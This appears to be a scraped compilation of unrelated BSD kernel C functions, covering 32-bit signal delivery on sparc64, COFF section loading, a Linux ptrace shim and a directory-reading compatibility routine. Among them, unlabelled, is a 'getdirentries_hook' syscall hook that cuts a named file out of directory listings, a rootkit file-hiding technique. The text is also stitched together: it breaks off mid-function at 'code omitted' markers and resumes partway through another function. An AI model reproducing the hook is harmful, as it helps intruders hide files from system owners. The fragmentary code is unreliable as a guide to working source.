/*
 * Deliver a SA_SIGINFO-style signal to a 32-bit (netbsd32) process on
 * sparc64: build a 32-bit ucontext describing the interrupted state,
 * copy it and the siginfo out to a signal frame on the user stack (or
 * the alternate signal stack), then redirect the trapframe so the
 * process resumes in the user's handler.
 *
 * ksi  - the signal being posted (signal number plus siginfo payload)
 * mask - signal mask to be restored by sigreturn
 *
 * Called with p->p_lock held; the lock is dropped around the copyouts.
 */
static void
netbsd32_sendsig_siginfo(const ksiginfo_t *ksi, const sigset_t *mask)
{
struct lwp *l = curlwp;
struct proc *p = l->l_proc;
struct sigacts *ps = p->p_sigacts;
int onstack;
int sig = ksi->ksi_signo;
ucontext32_t uc;
struct sparc32_sigframe_siginfo *fp;
netbsd32_intptr_t catcher;
struct trapframe64 *tf = l->l_md.md_tf;
struct rwindow32 *oldsp, *newsp;
int ucsz, error;
/* Need to attempt to zero extend this 32-bit pointer */
oldsp = (struct rwindow32*)(u_long)(u_int)tf->tf_out[6];
/* Do we need to jump onto the signal stack? */
onstack =
(l->l_sigstk.ss_flags & (SS_DISABLE | SS_ONSTACK)) == 0 &&
(SIGACTION(p, sig).sa_flags & SA_ONSTACK) != 0;
/* Allocate space for the signal handler context. */
if (onstack)
fp = (struct sparc32_sigframe_siginfo *)
((char *)l->l_sigstk.ss_sp +
l->l_sigstk.ss_size);
else
fp = (struct sparc32_sigframe_siginfo *)oldsp;
/* Step down one frame and round down to an 8-byte boundary. */
fp = (struct sparc32_sigframe_siginfo*)((u_long)(fp - 1) & ~7);
/*
 * Build the signal context to be used by sigreturn.
 * _UC_SETSTACK/_UC_CLRSTACK tell sigreturn whether SS_ONSTACK should
 * remain set once the handler returns.
 */
uc.uc_flags = _UC_SIGMASK |
((l->l_sigstk.ss_flags & SS_ONSTACK)
? _UC_SETSTACK : _UC_CLRSTACK);
uc.uc_sigmask = *mask;
uc.uc_link = (uint32_t)(uintptr_t)l->l_ctxlink;
memset(&uc.uc_stack, 0, sizeof(uc.uc_stack));
sendsig_reset(l, sig);
/*
 * Now copy the stack contents out to user space.
 * We need to make sure that when we start the signal handler,
 * its %i6 (%fp), which is loaded from the newly allocated stack area,
 * joins seamlessly with the frame it was in when the signal occurred,
 * so that the debugger and _longjmp code can back up through it.
 * Since we're calling the handler directly, allocate a full size
 * C stack frame.
 */
/* Drop p_lock across the user-space copies, which may fault/sleep. */
mutex_exit(p->p_lock);
cpu_getmcontext32(l, &uc.uc_mcontext, &uc.uc_flags);
/* Copy out only up to __uc_pad; the trailing pad bytes are unused. */
ucsz = (int)(intptr_t)&uc.__uc_pad - (int)(intptr_t)&uc;
newsp = (struct rwindow32*)((intptr_t)fp - sizeof(struct frame32));
/* The suword() links the new window's saved %fp to the old frame. */
error = (copyout(&ksi->ksi_info, &fp->sf_si, sizeof ksi->ksi_info) ||
copyout(&uc, &fp->sf_uc, ucsz) ||
suword(&newsp->rw_in[6], (intptr_t)oldsp));
mutex_enter(p->p_lock);
if (error) {
/*
 * Process has trashed its stack; give it an illegal
 * instruction to halt it in its tracks.
 */
sigexit(l, SIGILL);
/* NOTREACHED */
}
switch (ps->sa_sigdesc[sig].sd_vers) {
default:
/* Unsupported trampoline version; kill the process. */
sigexit(l, SIGILL);
case 2:
/*
 * Arrange to continue execution at the user's handler.
 * It needs a new stack pointer, a return address and
 * three arguments: (signo, siginfo *, ucontext *).
 */
catcher = (intptr_t)SIGACTION(p, sig).sa_handler;
tf->tf_pc = catcher;
tf->tf_npc = catcher + 4;
tf->tf_out[0] = sig;
tf->tf_out[1] = (intptr_t)&fp->sf_si;
tf->tf_out[2] = (intptr_t)&fp->sf_uc;
tf->tf_out[6] = (intptr_t)newsp;
/* %o7 + 8 is the return PC, so aim 8 before the trampoline entry. */
tf->tf_out[7] = (intptr_t)ps->sa_sigdesc[sig].sd_tramp - 8;
break;
}
/* Remember that we're now on the signal stack. */
if (onstack)
l->l_sigstk.ss_flags |= SS_ONSTACK;
}
/*
* getdirentries system call hook.
* Hides the file T_NAME.
*/
static int
getdirentries_hook(struct thread *td, void *syscall_args)
{
struct getdirentries_args /* {
int fd;
char *buf;
u_int count;
long *basep;
} */ *uap;
uap = (struct getdirentries_args *)syscall_args;
struct dirent *dp, *current;
unsigned int size, count;
/*
* Store the directory entries found in fd in buf, and record the
* number of bytes actually transferred.
*/
getdirentries(td, syscall_args);
size = td->td_retval[0];
/* Does fd actually contain any directory entries? */
if (size > 0) {
MALLOC(dp, struct dirent *, size, M_TEMP, M_NOWAIT);
copyin(uap->buf, dp, size);
current = dp;
count = size;
/*
* Iterate through the directory entries found in fd.
* Note: The last directory entry always has a record length
* of zero.
*/
while ((current->d_reclen != 0) && (count > 0)) {
count -= current->d_reclen;
/* Do we want to hide this file? */
if(strcmp((char *)&(current->d_name), T_NAME) == 0)
{
/*
* Copy every directory entry found after
* T_NAME over T_NAME, effectively cutting it
* out.
*/
if (count != 0)
bcopy((char *)current +
current->d_reclen, current,
count);
size -= current->d_reclen;
break;
}
/*
* Are there still more directory entries to
* look through?
*/
if (count != 0)
/* Advance to the next record. */
current = (struct dirent *)((char *)current +
current->d_reclen);
}
/*
* If T_NAME was found in fd, adjust the "return values" to
* hide it. If T_NAME wasn't found...don't worry 'bout it.
*/
td->td_retval[0] = size;
copyout(dp, uap->buf, size);
FREE(dp, M_TEMP);
}
return(0);
}
/*
 * Map one COFF section from vnode vp into the target process's address
 * space at vmaddr.  The first filsz bytes are backed by the file at
 * byte offset `offset'; when memsz > filsz the tail is zero-filled
 * anonymous (BSS-style) memory, with the partial last file page copied
 * in by hand via a temporary kernel mapping.
 *
 * Returns 0 on success or an errno-style error.
 */
static int
load_coff_section(struct vmspace *vmspace, struct vnode *vp, vm_offset_t offset,
caddr_t vmaddr, size_t memsz, size_t filsz, vm_prot_t prot)
{
size_t map_len;
vm_offset_t map_offset;
vm_offset_t map_addr;
int error;
unsigned char *data_buf = 0;
size_t copy_len;
/* vm_mmap() deals in whole pages: align file offset and VA down. */
map_offset = trunc_page(offset);
map_addr = trunc_page((vm_offset_t)vmaddr);
if (memsz > filsz) {
/*
 * We have the stupid situation that
 * the section is longer than it is on file,
 * which means it has zero-filled areas, and
 * we have to work for it. Stupid iBCS!
 *
 * Map only the fully file-backed pages here; the partial
 * trailing page (if any) is handled after the BSS is set up.
 */
map_len = trunc_page(offset + filsz) - trunc_page(map_offset);
} else {
/*
 * The only stuff we care about is on disk, and we
 * don't care if we map in more than is really there.
 */
map_len = round_page(offset + filsz) - trunc_page(map_offset);
}
DPRINTF(("%s(%d): vm_mmap(&vmspace->vm_map, &0x%08jx, 0x%x, 0x%x, "
"VM_PROT_ALL, MAP_PRIVATE | MAP_FIXED, OBJT_VNODE, vp, 0x%x)\n",
__FILE__, __LINE__, (uintmax_t)map_addr, map_len, prot,
map_offset));
/* Map the file-backed portion of the section. */
if ((error = vm_mmap(&vmspace->vm_map,
&map_addr,
map_len,
prot,
VM_PROT_ALL,
MAP_PRIVATE | MAP_FIXED,
OBJT_VNODE,
vp,
map_offset)) != 0)
return error;
if (memsz == filsz) {
/* We're done! */
return 0;
}
/*
 * Now we have screwball stuff, to accomodate stupid COFF.
 * We have to map the remaining bit of the file into the kernel's
 * memory map, allocate some anonymous memory, copy that last
 * bit into it, and then we're done. *sigh*
 * For clean-up reasons, we actally map in the file last.
 */
/* Bytes of file data that land on the partial last page. */
copy_len = (offset + filsz) - trunc_page(offset + filsz);
map_addr = trunc_page((vm_offset_t)vmaddr + filsz);
map_len = round_page((vm_offset_t)vmaddr + memsz) - map_addr;
DPRINTF(("%s(%d): vm_map_find(&vmspace->vm_map, NULL, 0, &0x%08jx,0x%x, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0)\n", __FILE__, __LINE__, (uintmax_t)map_addr, map_len));
/* Allocate the zero-filled (BSS) pages past the file-backed data. */
if (map_len != 0) {
error = vm_map_find(&vmspace->vm_map, NULL, 0, &map_addr,
map_len, VMFS_NO_SPACE, VM_PROT_ALL, VM_PROT_ALL, 0);
if (error)
return (vm_mmap_to_errno(error));
}
/*
 * Temporarily map the last file page into the kernel (exec_map) so
 * its partial-page data can be copied out to the process.
 * NOTE(review): if this vm_mmap fails, the anonymous mapping created
 * just above is left in place -- presumably torn down with the whole
 * vmspace on exec failure; verify against the caller.
 */
if ((error = vm_mmap(exec_map,
(vm_offset_t *) &data_buf,
PAGE_SIZE,
VM_PROT_READ,
VM_PROT_READ,
0,
OBJT_VNODE,
vp,
trunc_page(offset + filsz))) != 0)
return error;
/* Copy the tail of the file data into the freshly allocated pages. */
error = copyout(data_buf, (caddr_t) map_addr, copy_len);
/* Drop the temporary kernel mapping regardless of copyout result. */
if (vm_map_remove(exec_map,
(vm_offset_t) data_buf,
(vm_offset_t) data_buf + PAGE_SIZE))
panic("load_coff_section vm_map_remove failed");
return error;
}
int
linux_ptrace(struct thread *td, struct linux_ptrace_args *uap)
{
union {
struct linux_pt_reg reg;
struct linux_pt_fpreg fpreg;
struct linux_pt_fpxreg fpxreg;
} r;
union {
struct reg bsd_reg;
struct fpreg bsd_fpreg;
struct dbreg bsd_dbreg;
} u;
void *addr;
pid_t pid;
int error, req;
error = 0;
/* by default, just copy data intact */
req = uap->req;
pid = (pid_t)uap->pid;
addr = (void *)uap->addr;
switch (req) {
case PTRACE_TRACEME:
case PTRACE_POKETEXT:
case PTRACE_POKEDATA:
case PTRACE_KILL:
error = kern_ptrace(td, req, pid, addr, uap->data);
break;
case PTRACE_PEEKTEXT:
case PTRACE_PEEKDATA: {
/* need to preserve return value */
int rval = td->td_retval[0];
error = kern_ptrace(td, req, pid, addr, 0);
if (error == 0)
error = copyout(td->td_retval, (void *)uap->data,
sizeof(l_int));
td->td_retval[0] = rval;
break;
}
case PTRACE_DETACH:
error = kern_ptrace(td, PT_DETACH, pid, (void *)1,
map_signum(uap->data));
break;
case PTRACE_SINGLESTEP:
case PTRACE_CONT:
error = kern_ptrace(td, req, pid, (void *)1,
map_signum(uap->data));
break;
case PTRACE_ATTACH:
error = kern_ptrace(td, PT_ATTACH, pid, addr, uap->data);
break;
case PTRACE_GETREGS:
/* Linux is using data where FreeBSD is using addr */
error = kern_ptrace(td, PT_GETREGS, pid, &u.bsd_reg, 0);
if (error == 0) {
map_regs_to_linux(&u.bsd_reg, &r.reg);
error = copyout(&r.reg, (void *)uap->data,
sizeof(r.reg));
}
break;
case PTRACE_SETREGS:
/* Linux is using data where FreeBSD is using addr */
error = copyin((void *)uap->data, &r.reg, sizeof(r.reg));
if (error == 0) {
map_regs_from_linux(&u.bsd_reg, &r.reg);
error = kern_ptrace(td, PT_SETREGS, pid, &u.bsd_reg, 0);
}
break;
case PTRACE_GETFPREGS:
/* Linux is using data where FreeBSD is using addr */
error = kern_ptrace(td, PT_GETFPREGS, pid, &u.bsd_fpreg, 0);
if (error == 0) {
map_fpregs_to_linux(&u.bsd_fpreg, &r.fpreg);
error = copyout(&r.fpreg, (void *)uap->data,
sizeof(r.fpreg));
}
break;
case PTRACE_SETFPREGS:
/* Linux is using data where FreeBSD is using addr */
error = copyin((void *)uap->data, &r.fpreg, sizeof(r.fpreg));
if (error == 0) {
map_fpregs_from_linux(&u.bsd_fpreg, &r.fpreg);
error = kern_ptrace(td, PT_SETFPREGS, pid,
&u.bsd_fpreg, 0);
}
break;
case PTRACE_SETFPXREGS:
error = copyin((void *)uap->data, &r.fpxreg, sizeof(r.fpxreg));
if (error)
break;
/* FALL THROUGH */
case PTRACE_GETFPXREGS: {
struct proc *p;
struct thread *td2;
if (sizeof(struct linux_pt_fpxreg) != sizeof(struct savexmm)) {
static int once = 0;
//.........这里部分代码省略.........
//.........这里部分代码省略.........
VOP_UNLOCK(vp);
if (error)
goto out1;
loff = fp->f_offset;
nbytes = SCARG(uap, count);
buflen = min(MAXBSIZE, nbytes);
if (buflen < va.va_blocksize)
buflen = va.va_blocksize;
tbuf = malloc(buflen, M_TEMP, M_WAITOK);
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
off = fp->f_offset;
again:
aiov.iov_base = tbuf;
aiov.iov_len = buflen;
auio.uio_iov = &aiov;
auio.uio_iovcnt = 1;
auio.uio_rw = UIO_READ;
auio.uio_resid = buflen;
auio.uio_offset = off;
UIO_SETUP_SYSSPACE(&auio);
/*
* First we read into the malloc'ed buffer, then
* we massage it into user space, one record at a time.
*/
error = VOP_READDIR(vp, &auio, fp->f_cred, &eofflag, &cookiebuf,
&ncookies);
if (error)
goto out;
inp = (char *)tbuf;
outp = SCARG(uap, buf);
resid = nbytes;
if ((len = buflen - auio.uio_resid) == 0)
goto eof;
for (cookie = cookiebuf; len > 0; len -= reclen) {
bdp = (struct dirent *)inp;
reclen = bdp->d_reclen;
if (reclen & 3)
panic(__func__);
if (bdp->d_fileno == 0) {
inp += reclen; /* it is a hole; squish it out */
if (cookie)
off = *cookie++;
else
off += reclen;
continue;
}
old_reclen = _DIRENT_RECLEN(&idb, bdp->d_namlen);
if (reclen > len || resid < old_reclen) {
/* entry too big for buffer, so just stop */
outp++;
break;
}
/*
* Massage in place to make a Dirent12-shaped dirent (otherwise
* we have to worry about touching user memory outside of
* the copyout() call).
*/
idb.d_fileno = (uint32_t)bdp->d_fileno;
idb.d_reclen = (uint16_t)old_reclen;
idb.d_namlen = (uint16_t)bdp->d_namlen;
strcpy(idb.d_name, bdp->d_name);
if ((error = copyout(&idb, outp, old_reclen)))
goto out;
/* advance past this real entry */
inp += reclen;
if (cookie)
off = *cookie++; /* each entry points to itself */
else
off += reclen;
/* advance output past Dirent12-shaped entry */
outp += old_reclen;
resid -= old_reclen;
}
/* if we squished out the whole block, try again */
if (outp == SCARG(uap, buf)) {
if (cookiebuf)
free(cookiebuf, M_TEMP);
cookiebuf = NULL;
goto again;
}
fp->f_offset = off; /* update the vnode offset */
eof:
*retval = nbytes - resid;
out:
VOP_UNLOCK(vp);
if (cookiebuf)
free(cookiebuf, M_TEMP);
free(tbuf, M_TEMP);
out1:
fd_putfile(SCARG(uap, fd));
if (error)
return error;
return copyout(&loff, SCARG(uap, basep), sizeof(long));
}
/* (scraper residue: "please leave a comment" -- not part of the original source) */